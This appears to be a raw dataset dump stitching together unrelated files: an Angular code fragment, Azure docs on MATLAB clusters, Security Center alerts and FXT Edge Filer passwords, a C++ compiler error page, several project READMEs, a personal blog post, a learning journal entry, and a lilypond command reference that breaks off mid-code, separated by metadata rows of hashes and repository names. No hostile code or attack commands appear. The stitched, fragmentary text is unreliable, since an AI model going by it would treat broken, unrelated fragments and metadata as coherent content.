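  imports: [CoreModule],
  declarations: [TodoItemComponent],
  bootstrap: TodoItemComponent, // assumption: a root component is bootstrapped
};

Browser.bootstrap(AppModule);
```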
35.4
482
0.736636
eng_Latn
0.273263
53916b61918035b97b5bb676168665c00c7d24ee
8,082
md
Markdown
articles/virtual-machines/windows/matlab-mdcs-cluster.md
changeworld/azure-docs.pl-pl
f97283ce868106fdb5236557ef827e56b43d803e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/virtual-machines/windows/matlab-mdcs-cluster.md
changeworld/azure-docs.pl-pl
f97283ce868106fdb5236557ef827e56b43d803e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/virtual-machines/windows/matlab-mdcs-cluster.md
changeworld/azure-docs.pl-pl
f97283ce868106fdb5236557ef827e56b43d803e
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: MATLAB clusters on virtual machines
description: Use Microsoft Azure virtual machines to create MATLAB Distributed Computing Server clusters to run compute-intensive parallel MATLAB workloads
services: virtual-machines-windows
documentationcenter: ''
author: mscurrell
manager: gwallace
editor: ''
ms.assetid: e9980ce9-124a-41f1-b9ec-f444c8ea5c72
ms.service: virtual-machines-windows
ms.topic: article
ms.tgt_pltfrm: Windows
ms.workload: infrastructure-services
ms.date: 05/09/2016
ms.author: markscu
ms.openlocfilehash: a2fb2479f5544b869b51e796085fcb4d0b76121a
ms.sourcegitcommit: 2ec4b3d0bad7dc0071400c2a2264399e4fe34897
ms.translationtype: MT
ms.contentlocale: pl-PL
ms.lasthandoff: 03/27/2020
ms.locfileid: "74038142"
---
# <a name="create-matlab-distributed-computing-server-clusters-on-azure-vms"></a>Create MATLAB Distributed Computing Server clusters on Azure VMs

Use Microsoft Azure virtual machines to create one or more MATLAB Distributed Computing Server clusters to run your compute-intensive parallel MATLAB workloads. Install the MATLAB Distributed Computing Server software on a VM to use as a base image, and use an Azure quickstart template or Azure PowerShell script (available on [GitHub](https://github.com/Azure/azure-quickstart-templates/tree/master/matlab-cluster)) to deploy and manage the cluster. After deployment, connect to the cluster to run your workloads.

## <a name="about-matlab-and-matlab-distributed-computing-server"></a>About MATLAB and MATLAB Distributed Computing Server

The [MATLAB](https://www.mathworks.com/products/matlab/) platform is optimized for solving engineering and scientific problems. MATLAB users with large-scale simulations and data processing tasks can use MathWorks parallel computing products to speed up their compute-intensive workloads by taking advantage of compute clusters and grid services. [Parallel Computing Toolbox](https://www.mathworks.com/products/parallel-computing/) lets MATLAB users parallelize applications and take advantage of multi-core processors, GPUs, and compute clusters. [MATLAB Distributed Computing Server](https://www.mathworks.com/products/distriben/) enables MATLAB users to use many computers in a compute cluster.

Using Azure virtual machines, you can create MATLAB Distributed Computing Server clusters that have all the same mechanisms available to submit parallel work as on-premises clusters, such as interactive jobs, batch jobs, independent tasks, and communicating tasks. Using Azure in conjunction with the MATLAB platform has many advantages compared to provisioning and using traditional on-premises hardware: a range of virtual machine sizes, creation of clusters on demand so that you pay only for the compute resources you use, and the ability to test models at scale.

## <a name="prerequisites"></a>Prerequisites

* **Client computer** - You need a Windows-based client computer to communicate with Azure and the MATLAB Distributed Computing Server cluster after deployment.
* **Azure PowerShell** - See [How to install and configure Azure PowerShell](/powershell/azure/overview) to install it on your client computer.
* **Azure subscription** - If you don't have a subscription, you can create a [free account](https://azure.microsoft.com/free/) in just a couple of minutes. For larger clusters, consider a pay-as-you-go subscription or other purchase options.
* **vCPU quota** - You might need to increase the vCPU quota to deploy a large cluster or more than one MATLAB Distributed Computing Server cluster. To increase a quota, [open an online customer support request](https://azure.microsoft.com/blog/2014/06/04/azure-limits-quotas-increase-requests/) at no charge.
* **MATLAB, Parallel Computing Toolbox, and MATLAB Distributed Computing Server licenses** - The scripts assume that the [MathWorks Hosted License Manager](https://www.mathworks.com/help/install/license-management.html) is used for all licenses.
* **MATLAB Distributed Computing Server software** - Will be installed on a VM that will be used as the base VM image for the cluster VMs.

## <a name="high-level-steps"></a>High-level steps

To use Azure virtual machines for your MATLAB Distributed Computing Server clusters, the following high-level steps are required. Detailed instructions are in the documentation accompanying the quickstart template and scripts on [GitHub](https://github.com/Azure/azure-quickstart-templates/tree/master/matlab-cluster).

1. **Create a base VM image**
   * Download and install the MATLAB Distributed Computing Server software onto this VM.
   > [!NOTE]
   > This process can take a couple of hours, but you only have to do it once for each version of MATLAB you use.
   >
   >

2. **Create one or more clusters**
   * Use the supplied PowerShell script or the quickstart template to create a cluster from the base VM image.
   * Manage the clusters by using the supplied PowerShell script, which allows you to list, pause, resume, and delete clusters.

## <a name="cluster-configurations"></a>Cluster configurations

Currently, the cluster creation script and template enable you to create a single MATLAB Distributed Computing Server topology. If you want, create one or more additional clusters, with each cluster having a different number of worker VMs, using different VM sizes, and so on.

### <a name="matlab-client-and-cluster-in-azure"></a>MATLAB client and cluster in Azure

The MATLAB client node, the MATLAB Job Scheduler node, and the MATLAB Distributed Computing Server "worker" nodes are configured as Azure VMs in a virtual network, as shown in the following figure.

* To use the cluster, connect via Remote Desktop to the client node. The client node runs the MATLAB client.
* The client node has a file share that can be accessed by all workers.
* The MathWorks Hosted License Manager is used for the license checks for all of the MATLAB software.
* By default, one MATLAB Distributed Computing Server worker per vCPU is created on the worker VMs, but you can specify any number.

## <a name="use-an-azure-based-cluster"></a>Use an Azure-based cluster

As with other types of MATLAB Distributed Computing Server clusters, you need to use the Cluster Profile Manager in the MATLAB client (on the client VM) to create a MATLAB Job Scheduler cluster profile.

![Cluster Profile Manager](./media/matlab-mdcs-cluster/cluster_profile_manager.png)

## <a name="next-steps"></a>Next steps

* For detailed instructions to deploy and manage MATLAB Distributed Computing Server clusters in Azure, see the [GitHub](https://github.com/Azure/azure-quickstart-templates/tree/master/matlab-cluster) repository containing the templates and scripts.
* Go to the [MathWorks site](https://www.mathworks.com/) for detailed documentation for MATLAB and MATLAB Distributed Computing Server.
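Once a cluster profile exists, submitting work looks like it does on any other MATLAB Job Scheduler cluster. A hedged sketch follows; the profile name `'AzureMJS'`, the function, and the pool size are placeholder assumptions:

```matlab
% Hypothetical usage: the profile name below is whatever you created
% in the Cluster Profile Manager.
c = parcluster('AzureMJS');

% Submit a batch job that runs a function with an 8-worker parallel pool.
job = batch(c, @sum, 1, {rand(1, 1e6)}, 'Pool', 8);
wait(job);                  % block until the job finishes
out = fetchOutputs(job);    % collect the single declared output
delete(job);                % free the job's resources on the scheduler
```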
107.76
813
0.828879
pol_Latn
0.999675
5391747b43459351afa1cfdbd1a7a1e0d33f358d
4,911
md
Markdown
articles/security-center/security-center-alerts-overview.md
cedarkuo/azure-docs.zh-tw
35578e41dc1bd28a8859b2dcc02f71c8c5b26f90
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security-center/security-center-alerts-overview.md
cedarkuo/azure-docs.zh-tw
35578e41dc1bd28a8859b2dcc02f71c8c5b26f90
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security-center/security-center-alerts-overview.md
cedarkuo/azure-docs.zh-tw
35578e41dc1bd28a8859b2dcc02f71c8c5b26f90
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Security alerts in Azure Security Center | Microsoft Docs
description: This topic explains what security alerts are and the different types available in Azure Security Center.
services: security-center
documentationcenter: na
author: memildin
manager: rkarlin

ms.assetid: 1b71e8ad-3bd8-4475-b735-79ca9963b823
ms.service: security-center
ms.topic: conceptual
ms.date: 03/15/2020
ms.author: memildin
ms.openlocfilehash: 697c038a2fefdde8e488dad23a4e38e0b2b7b288
ms.sourcegitcommit: 849bb1729b89d075eed579aa36395bf4d29f3bd9
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 04/28/2020
ms.locfileid: "79415861"
---
# <a name="security-alerts-in-azure-security-center"></a>Security alerts in Azure Security Center

In Azure Security Center, there are a variety of alerts for many different resource types. Security Center generates alerts for resources deployed on Azure, and also for resources deployed on on-premises and hybrid cloud environments.

Security alerts are triggered by advanced detections and are available only with the Standard tier of Azure Security Center. A free trial is available. You can upgrade from the pricing tier selection in the [security policy](security-center-pricing.md). To learn more about pricing, visit the [Security Center](https://azure.microsoft.com/pricing/details/security-center/) page.

## <a name="responding-to-todays-threats"></a>Responding to today's threats<a name="respond-threats"> </a>

There have been significant changes in the threat landscape over the last 20 years. In the past, companies typically only had to worry about individual attackers who might want to defface a web site to see "what they could do". Today's attackers are much more sophisticated and organized. They often have specific financial and strategic goals. They also have more resources available to them, as they may be funded by nation states or organized crime.

These changing realities have led to an unprecedented level of professionalism in the attacker ranks. No longer are they interested in web defacement. They are now interested in stealing information, financial accounts, and private data, all of which they can use to generate cash on the open market or to leverage a particular business, political, or military position. Even more concerning than attackers with a financial objective are the attackers who breach networks to do harm to infrastructure and people.

In response, organizations often deploy various point solutions that focus on defending either the enterprise perimeter or endpoints by looking for known attack signatures. These solutions tend to generate a high volume of low-fidelity alerts, which require a security analyst to triage and investigate. Most organizations lack the time and expertise required to respond to these alerts, so many of them go unaddressed.

In addition, attackers have evolved their methods to subvert many signature-based defenses and to [adapt to cloud environments](https://azure.microsoft.com/blog/detecting-threats-with-azure-security-center/). New approaches are required to more quickly identify emerging threats and expedite detection and response.

## <a name="what-are-security-alerts-and-security-incidents"></a>What are security alerts and security incidents?

**Alerts** are the notifications that Security Center generates when it detects threats on your resources. Security Center prioritizes and lists the alerts, along with the information needed for you to quickly investigate the problem. Security Center also provides recommendations for how you can remediate an attack.

A **security incident** is a collection of related alerts, instead of listing each alert individually. Security Center uses [cloud smart alert correlation](security-center-alerts-cloud-smart.md) to correlate different alerts and low-fidelity signals into security incidents.

Using incidents, Security Center provides you with a single view of an attack campaign and all of the related alerts. This view enables you to quickly understand what actions the attacker took and what resources were affected. For more information, see [Cloud smart alert correlation](security-center-alerts-cloud-smart.md).

## <a name="how-does-security-center-detect-threats"></a>How does Security Center detect threats? <a name="detect-threats"> </a>

Microsoft security researchers are constantly on the lookout for threats. Because of Microsoft's global presence in the cloud and on-premises, they have access to an expansive set of telemetry. The wide-reaching and diverse collection of datasets enables the discovery of new attack patterns and trends across Microsoft's on-premises consumer and enterprise products, as well as its online services. As a result, Security Center can rapidly update its detection algorithms as attackers release new and increasingly sophisticated exploits. This approach helps you keep pace with a fast-moving threat environment.

To detect real threats and reduce false positives, Security Center collects, analyzes, and integrates log data from your Azure resources and the network. It also works with connected partner solutions, like firewall and endpoint protection solutions. Security Center analyzes this information, often correlating information from multiple sources, to identify threats.

![Security Center data collection and presentation](./media/security-center-alerts-overview/security-center-detection-capabilities.png)

Security Center employs advanced security analytics, which go far beyond signature-based approaches. Breakthroughs in big data and [machine learning](https://azure.microsoft.com/blog/machine-learning-in-azure-security-center/) technologies are used to evaluate events across the entire cloud fabric, detecting threats that would be impossible to identify using manual approaches and predicting the evolution of attacks. These security analytics include:

* **Integrated threat intelligence**: Microsoft has an immense amount of global threat intelligence. Telemetry flows in from multiple sources, such as Azure, Office 365, Microsoft CRM Online, Microsoft Dynamics AX, outlook.com, MSN.com, the Microsoft Digital Crimes Unit (DCU), and the Microsoft Security Response Center (MSRC). Researchers also receive threat intelligence information that is shared among major cloud service providers, as well as feeds from other third parties. Azure Security Center can use this information to alert you to threats from known bad actors.

* **Behavioral analytics**: Behavioral analytics is a technique that analyzes and compares data to a collection of known patterns. However, these patterns are not simple signatures. They are determined through complex machine learning algorithms that are applied to massive datasets. They are also determined through careful analysis of malicious behaviors by expert analysts. Azure Security Center can use behavioral analytics to identify compromised resources based on analysis of virtual machine logs, virtual network device logs, fabric logs, crash dumps, and other sources.

* **Anomaly detection**: Azure Security Center also uses anomaly detection to identify threats. In contrast to behavioral analytics (which depends on known patterns derived from large data sets), anomaly detection is more "personalized" and focuses on baselines that are specific to your deployments. Machine learning is applied to determine normal activity for your deployments, and then rules are generated to define outlier conditions that could represent a security event.

## <a name="how-are-alerts-classified"></a>How are alerts classified?

Security Center assigns a severity to alerts to help you prioritize the order in which you attend to each alert, so that when a resource is compromised, you can get to it right away. The severity is based on how confident Security Center is in the finding, or the analytic used to issue the alert, as well as the confidence level that there was malicious intent behind the activity that led to the alert.

> [!NOTE]
> Alert severity is displayed differently in the portal and in versions of the REST API that predate 01-01-2019. If you're using an older version of the API, upgrade for the consistent experience described below.

- **High:** There is a high probability that your resource is compromised. You should look into it right away. Security Center has high confidence in both the malicious intent and in the findings used to issue the alert. For example, an alert that detects the execution of a known malicious tool such as Mimikatz, a common tool used for credential theft.
- **Medium:** This is probably a suspicious activity that might indicate that a resource is compromised. Security Center's confidence in the analytic or finding is medium, and the confidence in the malicious intent is medium to high. These would usually be machine learning or anomaly-based detections. For example, a sign-in attempt from an anomalous location.
- **Low:** This might be a benign positive or a blocked attack.
  * Security Center is not confident enough that the intent is malicious, and the activity might be innocent. For example, log clear is an action that might happen when an attacker tries to hide their tracks, but in many cases it is a routine operation performed by admins.
  * Security Center doesn't usually tell you when attacks were blocked, unless it's an interesting case that we suggest you look into.
- **Informational:** You will only see informational alerts when you drill down into a security incident, or if you use the REST API with a specific alert ID. An incident is typically made up of a number of alerts, some of which might appear on their own to be only informational, but in the context of the other alerts might be worthy of a closer look.

## <a name="continuous-monitoring-and-assessments"></a>Continuous monitoring and assessments

Azure Security Center benefits from having security research and data science teams throughout Microsoft who continuously monitor for changes in the threat landscape. This includes the following initiatives:

* **Threat intelligence monitoring**: Threat intelligence includes mechanisms, indicators, implications, and actionable advice about existing or emerging threats. This information is shared in the security community, and Microsoft continuously monitors threat intelligence feeds from internal and external sources.
* **Signal sharing**: Insights from security teams across Microsoft's broad portfolio of cloud and on-premises services, servers, and client endpoint devices are shared and analyzed.
* **Microsoft security specialists**: Ongoing engagement with teams across Microsoft that work in specialized security fields, like forensics and web attack detection.
* **Detection tuning**: Algorithms are run against real customer data sets, and security researchers work with customers to validate the results. True and false positives are used to refine the machine learning algorithms.

These combined efforts culminate in new and improved detections, which you can benefit from instantly; there's no action for you to take.

## <a name="next-steps"></a>Next steps

In this article, you learned about the different types of alerts available in Security Center. For more information, see:

* [Threat protection in Azure Security Center](threat-protection.md) - A brief description of the sources of the security alerts that Azure Security Center displays
* **Security alerts in Azure Activity Log** - In addition to being available in the Azure portal or programmatically, security alerts and incidents are audited as events in [Azure Activity Log](https://docs.microsoft.com/azure/azure-monitor/platform/activity-log-view). For the event schema, see [Security alerts in Azure Activity Log](https://go.microsoft.com/fwlink/?linkid=2114113)
262
0.822032
yue_Hant
0.979244
5391a452f2fb32df01ceececcb43f4d65a801a6b
1,296
md
Markdown
src/posts/2006-11-08-Flower-City.md
mgthantzin/gatsby-starter-default
fcf3eadeb2c64d23e5d2b3ed28755dfd7a4949d1
[ "MIT" ]
null
null
null
src/posts/2006-11-08-Flower-City.md
mgthantzin/gatsby-starter-default
fcf3eadeb2c64d23e5d2b3ed28755dfd7a4949d1
[ "MIT" ]
null
null
null
src/posts/2006-11-08-Flower-City.md
mgthantzin/gatsby-starter-default
fcf3eadeb2c64d23e5d2b3ed28755dfd7a4949d1
[ "MIT" ]
null
null
null
---
title: Flower City
date: 2006-11-08T23:49:44+00:00
template: "post"
draft: false
slug: "flower-town/"
category: "Note"
tags:
  - "stress"
  - "Pyin Oo Lwin"
  - "May Myo"
  - "Mandalay"
  - "resort"
description: "Ever since tenth grade I have been well acquainted with stress, worry, and pressure. Now that I am in Singapore it is even worse. So I have always wanted a stressless state, one permanently free of worry. (Short of death, of course.)"
---

Ever since tenth grade I have been well acquainted with stress, worry, and pressure. Now that I am in Singapore it is even worse. So I have always wanted a stressless state, one permanently free of worry. (Short of death, of course.)

Memorably, every time in my life that I reach that little flower city, my worries fall away. The little town is not some backwater left behind by the times; it is a budding, modern town. Yet the life of the locals (unlike in the big city) has a deeply peaceful character. It feels free of greed and anger. It is true that the calm little hill town calms my life as well.

How much do I love that town? I want the air I draw in with my very last breath to be the cool air of that town.

(I hope everyone will read this post of mine, whatever it is, and understand. =P)
58.909091
301
0.42284
mya_Mymr
0.98811
5391f63c8d0dff1d231a0b0414cdfc8076ce96d0
249
md
Markdown
README.md
Ryxai/LADP
cfb340584267ceb8d4dce2b6ef0d191f2a030fea
[ "MIT" ]
null
null
null
README.md
Ryxai/LADP
cfb340584267ceb8d4dce2b6ef0d191f2a030fea
[ "MIT" ]
null
null
null
README.md
Ryxai/LADP
cfb340584267ceb8d4dce2b6ef0d191f2a030fea
[ "MIT" ]
null
null
null
# README

This contains notes on papers from [CMPS290S-2018-09's reading list](http://composition.al/CMPS290S-2018-09/). Notes have been written using [Typora](https://typora.io/) and will render best there with the inline math setting turned on.
49.8
126
0.763052
eng_Latn
0.980564
5392b240d1bee38dabe30ff807c7ae90be0f6d30
178
md
Markdown
LJ-code301-day20.md
ClairJ/daily-learning-journals
2f01d0fcbf433a020bca3d168b9c5a945a210778
[ "MIT" ]
null
null
null
LJ-code301-day20.md
ClairJ/daily-learning-journals
2f01d0fcbf433a020bca3d168b9c5a945a210778
[ "MIT" ]
null
null
null
LJ-code301-day20.md
ClairJ/daily-learning-journals
2f01d0fcbf433a020bca3d168b9c5a945a210778
[ "MIT" ]
null
null
null
## LJ Code301-Day20

We met MVP, and now we are all individually picking pieces of work we want to do and adding them to the project, including stretch goals such as animations and a login page.
59.333333
157
0.775281
eng_Latn
0.999637
539470e169afd7d4c9cb3753efb7934d76b0e137
877
md
Markdown
docs/error-messages/compiler-errors-2/compiler-error-c3464.md
lc-soft/cpp-docs.zh-cn
cf307d328a2a9ed55de6f490b98e05e0f139fe5f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/error-messages/compiler-errors-2/compiler-error-c3464.md
lc-soft/cpp-docs.zh-cn
cf307d328a2a9ed55de6f490b98e05e0f139fe5f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/error-messages/compiler-errors-2/compiler-error-c3464.md
lc-soft/cpp-docs.zh-cn
cf307d328a2a9ed55de6f490b98e05e0f139fe5f
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Compiler Error C3464
ms.date: 11/04/2016
f1_keywords:
  - C3464
helpviewer_keywords:
  - C3464
ms.assetid: 0ede05dc-4486-4921-8e8c-78ab5a2e09c5
ms.openlocfilehash: b21810d6df1fbfaf5ea94d9515487b16d00af548
ms.sourcegitcommit: 0ab61bc3d2b6cfbd52a16c6ab2b97a8ea1864f12
ms.translationtype: MT
ms.contentlocale: zh-CN
ms.lasthandoff: 04/23/2019
ms.locfileid: "62222327"
---
# <a name="compiler-error-c3464"></a>Compiler Error C3464

'type': a nested type cannot be forwarded

Type forwarding cannot be performed on nested types. For more information, see [Type forwarding (C++/CLI)](../../extensions/type-forwarding-cpp-cli.md).

## <a name="example"></a>Example

The following sample creates a component.

```
// C3464.cpp
// compile with: /LD /clr
public ref class R {
public:
   ref class N {};
};
```

## <a name="example"></a>Example

The following sample generates C3464.

```
// C3464_b.cpp
// compile with: /clr /c
#using "C3464.dll"

[assembly:TypeForwardedTo(R::N::typeid)];   // C3464
[assembly:TypeForwardedTo(R::typeid)];   // OK
```
18.659574
72
0.711517
yue_Hant
0.204358
53947d429d1ab75242afebdf96dc3379c94004b3
489
md
Markdown
README.md
kjoconnor/cabot-alert-slack
51dad1455ea849325ea6785b202f5e5305eb792e
[ "BSD-3-Clause" ]
10
2015-08-15T07:17:01.000Z
2020-07-31T13:06:12.000Z
README.md
kjoconnor/cabot-alert-slack
51dad1455ea849325ea6785b202f5e5305eb792e
[ "BSD-3-Clause" ]
3
2015-12-07T13:12:32.000Z
2016-09-30T10:52:49.000Z
README.md
kjoconnor/cabot-alert-slack
51dad1455ea849325ea6785b202f5e5305eb792e
[ "BSD-3-Clause" ]
7
2015-10-24T00:07:59.000Z
2021-04-08T11:08:24.000Z
# cabot-alert-slack

A simple [Cabot] alerting plugin for [Slack]. It's intended as a general "alert log" and not as a primary source for on-call alerts, and as such it doesn't do anything with the duty roster or subscriptions.

## installation

```
# add the plugin to the list of enabled plugins
CABOT_PLUGINS_ENABLED=...,cabot_alert_slack==1.0

SLACK_WEBHOOK_URL=https://...
SLACK_ALERT_CHANNEL="#monitoring"
```

[Cabot]: https://github.com/arachnys/cabot
[Slack]: https://slack.com/
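The README doesn't show the plugin internals, but the core of any Slack alert plugin is a POST to the configured incoming webhook. The Python sketch below is only an illustration of that mechanism (it is not this plugin's actual code); it assumes the standard Slack incoming-webhook JSON payload and the two environment variables documented above.

```python
import json
import os
from urllib.request import Request, urlopen

# Read the same settings the plugin documents above; values are hypothetical.
webhook_url = os.environ["SLACK_WEBHOOK_URL"]
channel = os.environ.get("SLACK_ALERT_CHANNEL", "#monitoring")

# Standard Slack incoming-webhook payload: a JSON body with a "text" field.
payload = {"channel": channel, "text": "Service 'api' is back to normal."}

request = Request(
    webhook_url,
    data=json.dumps(payload).encode("utf-8"),
    headers={"Content-Type": "application/json"},
)
with urlopen(request) as response:  # Slack replies with the body "ok" on success
    print(response.read().decode("utf-8"))
```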
25.736842
74
0.744376
eng_Latn
0.679376
53949a701ec447c6b87024368692b0ba0fc0f22f
2,329
md
Markdown
README.md
samrod777/Team-Generator-CLI
c03c827cd4aae17b6e6fa52dc52071f7937f0c67
[ "MIT" ]
null
null
null
README.md
samrod777/Team-Generator-CLI
c03c827cd4aae17b6e6fa52dc52071f7937f0c67
[ "MIT" ]
null
null
null
README.md
samrod777/Team-Generator-CLI
c03c827cd4aae17b6e6fa52dc52071f7937f0c67
[ "MIT" ]
null
null
null
# Team-Generator-CLI

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)

![Team Generator CLI](./lib/pictures/renderedHTML.png)

---

## Table of Contents

- [About the Project](#About-the-Project)
- [Getting Started](#Getting-Started)
- [Installation](#Installation)
- [Contributing](#Contributing)
- [Testing](#Testing)
- [License](#License)
- [Demo](#Demo)

## About the Project

This app allows the user to build a software engineering team by using a command line application. The application prompts the user for information about the team manager and then information about the team members. The user can input any number of team members, and they may be a mix of engineers and interns. When the user has completed building the team, the application will create an HTML file that displays a nicely formatted team roster based on the information provided by the user.

## Getting Started

To get started, follow the Installation instructions.

### Installation

Run the following command in your terminal to install required dependencies:

    npm install

## Testing

Run the following command in your terminal to run the tests:

    npm test

After the tests have passed you should see the following results:

![Team Generator CLI](./lib/pictures/TestsPassed.png)

## Contributing

To contribute to this project contact Sam Rodriguez.

Github Repository URL: https://github.com/samrod777/Team-Generator-CLI

## License

This application is covered under the MIT license.

## Demo

Once all of the dependencies have been installed, the user will be presented with a series of questions for the team manager and the option to choose the next member, as shown below:

![Team Generator CLI](./lib/pictures/addedManager.png)

In this demo the next team member will be an engineer; once the user selects the engineer option the following questions will be asked and the option of selecting the next team member will be given:

![Team Generator CLI](./lib/pictures/addedEngineer.png)

Lastly the intern option will be selected, and the team will be completed for this demo.

![Team Generator CLI](./lib/pictures/addedintern.png)

For a brief video demo, visit the link below:

https://drive.google.com/file/d/1mCAwQvpLcRLb-Fw2dweF91wpIZrRAeLe/view
42.345455
491
0.765135
eng_Latn
0.9951
5395772c19f9c34eec525e180dc06790b9bfa77e
6,790
md
Markdown
articles/fxt-edge-filer/node-password.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
1
2021-03-12T23:37:08.000Z
2021-03-12T23:37:08.000Z
articles/fxt-edge-filer/node-password.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/fxt-edge-filer/node-password.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: 'Tutorial: Initialize hardware - Azure FXT Edge Filer'
description: Learn how to connect to the hardware node and set an initial password on Azure FXT Edge Filer nodes.
author: femila
ms.author: femila
ms.service: fxt-edge-filer
ms.topic: tutorial
ms.date: 06/20/2019
ms.openlocfilehash: f78c7e60210d71aa94a20b4ce198a8d9d154a06f
ms.sourcegitcommit: 106f5c9fa5c6d3498dd1cfe63181a7ed4125ae6d
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 11/02/2021
ms.locfileid: "131033016"
---
# <a name="tutorial-set-hardware-passwords"></a>Tutorial: Set hardware passwords

The first time you turn on an Azure FXT Edge Filer node, you must set a root user password. The hardware nodes do not ship with a default password. Network ports are enabled only after the password has been set and the root user has signed in.

Do this step after installing and cabling the node, but before creating the cluster.

This tutorial explains how to connect to the hardware node and set the password. It also explains how to add a BIOS setup password to help secure the node.

In this tutorial, you learn how to:

> [!div class="checklist"]
>
> * Connect a keyboard and monitor to the node and turn it on
> * Set a BIOS setup password
> * Set passwords for the root user and for the iDRAC port on this node
> * Sign in as the root user

Repeat these steps for each node you will use in your cluster.

This tutorial takes about 15 minutes.

## <a name="prerequisites"></a>Prerequisites

Before you start this tutorial, complete these steps:

* [Install](install.md) each Azure FXT Edge Filer node in rack-mounted equipment, and attach power cables and network access as described in the [previous tutorial](network-power.md).
* Find a USB-connected keyboard and a VGA monitor that you can attach to the hardware nodes. (The node's serial port is inactive before the password is set.)

## <a name="connect-a-keyboard-and-monitor-to-the-node"></a>Connect a keyboard and monitor to the node

Physically connect a monitor and keyboard to the Azure FXT Edge Filer node.

* Connect the monitor to the VGA port.
* Connect the keyboard to one of the USB ports.

Use this reference diagram to locate the ports on the back of the chassis.

> [!NOTE]
> The serial port is inactive until a password has been set.

![diagram showing the back of the Azure FXT Edge Filer with the serial, VGA, and USB ports labeled](media/fxt-back-serial-vga-usb.png)

You can use a KVM switch if you want to connect multiple nodes to the same peripherals.

Turn on the node by pressing the power button on the front.

![diagram of the front of the Azure FXT Edge Filer - the round power button is labeled at top right](media/fxt-front-annotated.png)

## <a name="create-a-bios-setup-password"></a>Create a BIOS setup password

A BIOS setup password protects the node's BIOS settings from accidental or unauthorized changes. This password is not needed to create a cluster, but it is strongly recommended as part of your cluster's security strategy.

To create a BIOS setup password:

1. Turn on or restart the node, and immediately press F2 to open the system setup utility.
1. On the **System Setup Main Menu** screen, choose **System BIOS** > **System Security**.
1. Make sure the **Password Status** setting is **Unlocked**.
1. Use the **Setup Password** field to set the password. (You also can set a system BIOS password from this screen if you want to use one.)
1. Press ESC to go back to the **System BIOS** screen, and press ESC again. A message prompts you to save the changes. If the system does not restart automatically, restart it to get to the regular boot screen.<!-- how to exit this mode/do you need to reboot to get to the initial setup screen? -->

## <a name="set-initial-passwords"></a>Set initial passwords

The Azure FXT Edge Filer node prints various messages to the monitor as it boots. After a few moments, it shows an initial setup screen like this one:

```
------------------------------------------------------
Microsoft FXT node initial setup
------------------------------------------------------

Password Setup
---------------

Enter a password to set the iDRAC and temporary root password.
Minimum password length is 8.

NOTE: This does not set a BIOS setup password. For security,
Microsoft recommends using a BIOS setup password, restricting
physical access to the node, and other measures. Learn more at
https://aka.ms/fxt-security.

Enter new password:
```

The password you enter is used for two things:

* It is the temporary root password for this Azure FXT Edge Filer node. This password changes when you create a cluster using this node, or when you add this node to a cluster. The cluster management password (associated with the ``admin`` user) is also the root password for all nodes in a cluster.
* It is the long-term password for the iDRAC/IPMI hardware management port. Remember the password in case you need to sign in with IPMI later to troubleshoot a hardware problem.

Enter and then confirm the password:

```
Enter new password:**********
Re-enter password:**********

Loading AvereOS......
```

After you enter the password, the system continues to boot. When it finishes, it shows a ``login:`` prompt.

## <a name="sign-in-as-root"></a>Sign in as root

Sign in as ``root`` with the password you just set.

```
login: root
Password:**********
```

After you sign in as the root user, the network ports become active and contact the DHCP server for IP addresses.

## <a name="next-steps"></a>Next steps

The node is ready to be part of a cluster. You can use it to create the Azure FXT Edge Filer cluster, or you can [add it to an existing cluster](add-nodes.md).

> [!div class="nextstepaction"]
> [Create a cluster](cluster-create.md)
48.156028
346
0.75567
fra_Latn
0.982925
539604b6f3e90b2f4c0aa3a6519bd553172a2bac
1,386
md
Markdown
en/common/lilypond.md
reinhart1010/nix
a1803c718ead3b79854b65396c8967bd5ec32874
[ "CC-BY-4.0", "MIT" ]
null
null
null
en/common/lilypond.md
reinhart1010/nix
a1803c718ead3b79854b65396c8967bd5ec32874
[ "CC-BY-4.0", "MIT" ]
null
null
null
en/common/lilypond.md
reinhart1010/nix
a1803c718ead3b79854b65396c8967bd5ec32874
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
layout: page
title: common/lilypond (English)
description: "Typeset music and/or produce MIDI from file."
content_hash: 146522a83e98c9597909656fe35fd87c2ca25d3c
---
# lilypond

Typeset music and/or produce MIDI from file.
More information: <https://lilypond.org>.

- Compile a lilypond file into a PDF:

`lilypond `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/file</span>

- Compile into the specified format:

`lilypond --formats=`<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">format_dump</span>` `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/file</span>

- Compile the specified file, suppressing progress updates:

`lilypond -s `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/file</span>

- Compile the specified file, and also specify the output filename:

`lilypond --output=`<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/output_file</span>` `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/input_file</span>

- Show the current version of lilypond:

`lilypond --version`
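If you need to script these invocations, a small Python wrapper over the documented flags works. This sketch simply shells out to `lilypond` with the options listed above; the file names and the helper function are placeholders, not part of the lilypond documentation.

```python
import subprocess

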